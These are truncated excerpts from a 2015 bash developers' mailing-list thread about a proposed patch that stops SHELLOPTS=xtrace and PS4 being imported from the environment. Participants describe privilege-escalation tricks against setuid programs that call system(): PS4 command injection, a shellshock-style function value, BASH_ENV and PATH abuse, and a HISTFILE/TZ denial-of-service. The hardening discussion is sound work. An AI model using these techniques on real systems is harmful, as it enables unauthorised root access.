On 12/15/15 12:04 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> $ bash --version
> GNU bash, version 4.2.53(1)-release (x86_64-redhat-linux-gnu)
>
> Or did you just patch it, since you used "../bash-4.3-patched/bash ./x19" ?
No. bash-4.3-patched/bash is bash-4.3.42 (to distinguish it from bash-4
Quoting "Chet Ramey" :
Which should not be affected by what we're talking about, which is not
importing PS4 from the environment when uid == 0.
He later said "(Blocking PS4 and not SHELLOPTS=xtrace would work for
me in that
regard)".
Still shows how useful xtrace is and how it is necessa
On 12/15/15 10:40 AM, Stephane Chazelas wrote:
> 2015-12-15 09:01:05 -0500, Chet Ramey:
> [...]
>>> Mind explaining this one?
>>> I can't seem to write to HISTFILE in a non-interactive shell, or am i
>>> missing something?
>>
>> You just need to enable history (set -o history). History is independ
2015-12-15 09:01:05 -0500, Chet Ramey:
> On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> > Quoting "Stephane Chazelas" :
> >
> > I understand what you're saying.
> > As much as we would like, there's no way of stopping all attack vectors by
> > only hardening bash, not only that, but
Quoting "Stephane Chazelas" :
I don't know if you can make a non-interactive bash write to the
$HISTFILE, but bash, even when non-interactive, even when called
as sh, with SHELLOPTS=history will *read* the HISTFILE.
Thanks for clearing that up for me. Makes sense.
Quoting "Chet Ramey" :
I
On 12/15/15 11:37 AM, up201407...@alunos.dcc.fc.up.pt wrote:
>> You just need to enable history (set -o history). History is independent
>> of whether or not the shell is interactive; it's just enabled by default
>> in interactive shells.
>
> doing a "set -o history" didn't work for me, only whe
Quoting "Chet Ramey" :
On 12/15/15 11:37 AM, up201407...@alunos.dcc.fc.up.pt wrote:
You just need to enable history (set -o history). History is independent
of whether or not the shell is interactive; it's just enabled by default
in interactive shells.
doing a "set -o history" didn't work f
On 12/15/15 12:33 PM, Stephane Chazelas wrote:
> 2015-12-15 09:01:05 -0500, Chet Ramey:
>> On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
>>> Quoting "Stephane Chazelas" :
>>>
>>> I understand what you're saying.
>>> As much as we would like, there's no way of stopping all attack vecto
2015-12-15 09:01:05 -0500, Chet Ramey:
[...]
> > Mind explaining this one?
> > I can't seem to write to HISTFILE in a non-interactive shell, or am i
> > missing something?
>
> You just need to enable history (set -o history). History is independent
> of whether or not the shell is interactive; it
On 12/14/15 6:30 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> Quoting "Stephane Chazelas" :
>
> I understand what you're saying.
> As much as we would like, there's no way of stopping all attack vectors by
> only hardening bash, not only that, but also taking away its useful features.
> Though I s
2015-12-15 00:30:16 +0100, up201407...@alunos.dcc.fc.up.pt:
[...]
> >Should we also block SHELLOPTS=history
> >HISTFILE=/some/file like /proc/$pid/fd/$fd and
> >TZ=/proc/$pid/fd/$fd (like for your /bin/date command) as that
> >allows DoS on other processes (like where those fds are for
> >pipes).
>
Quoting "Stephane Chazelas" :
I understand what you're saying.
As much as we would like, there's no way of stopping all attack
vectors by only hardening bash, not only that, but also taking away
its useful features.
Though I still believe PS4 shouldn't be imported from the environment.
Sho
2015-12-14 18:01:13 +0100, up201407...@alunos.dcc.fc.up.pt:
[...]
> Obviously it's always the applications fault.
> The thing is that a simple patch in bash can stop most of these
> applicaions from getting exploited.
[...]
Should we also stop importing BASH_ENV in case some suid
application execu
Quoting "Stephane Chazelas" :
SHELLOPTS+PS4 is a known way to have the shell run arbitrary
commands. Before shellshock, env /bin/date='() { cmd; }' was
another one. The fix for shellshock closed that one.
Yes, exporting a function was a better known attack against this.
I can see why one mi
2015-12-13 12:49:58 -0500, Chet Ramey:
[...]
> I have to tell you, if I wanted to exploit a program written this poorly,
> I wouldn't mess around with SHELLOPTS. I'd go straight to PATH.
[...]
In the (very specific) OP's test case, he had
system("/bin/date"). Since /bin/date doesn't usually execu
Quoting "Chet Ramey" :
On 12/10/15 2:16 PM, up201407...@alunos.dcc.fc.up.pt wrote:
Hello,
This is a suggestion for a bash security hardening patch which prevents
xtrace from being initialized to the SHELLOPTS environment variable when a
new shell starts.
This is far too drastic a solution to
On 12/10/15 2:16 PM, up201407...@alunos.dcc.fc.up.pt wrote:
> Hello,
>
> This is a suggestion for a bash security hardening patch which prevents
> xtrace from being initialized to the SHELLOPTS environment variable when a
> new shell starts.
This is far too drastic a solution to the problem you h
Quoting Stephane Chazelas:
setuid bash will ignore SHELLOPTS (and drop privileges except
for the patched Debian version). In your case, since you're
doing a setuid(0), bash is no longer called as setuid, so can't
detect it.
Correct.
So you've got a shell started as root with the environment
Regarding my last email, instead of a "break;" it should be a "continue;".
Just realized that xtrace might not always be last in $SHELLOPTS, so
it would break out of the while loop and stop the parsing of the rest
of the options.
$ cat file.c
int main()
{
system("env");
}
$ gcc file.
2015-12-10 20:16:49 +0100, up201407...@alunos.dcc.fc.up.pt:
> Hello,
>
> This is a suggestion for a bash security hardening patch which
> prevents xtrace from being initialized to the SHELLOPTS environment
> variable when a new shell starts.
>
> xtrace can be used to exploit bogus system()/popen(
Hello,
This is a suggestion for a bash security hardening patch which
prevents xtrace from being initialized to the SHELLOPTS environment
variable when a new shell starts.
xtrace can be used to exploit bogus system()/popen() calls on setuid
binaries via a specially crafted PS4 environment
21 matches
Mail list logo
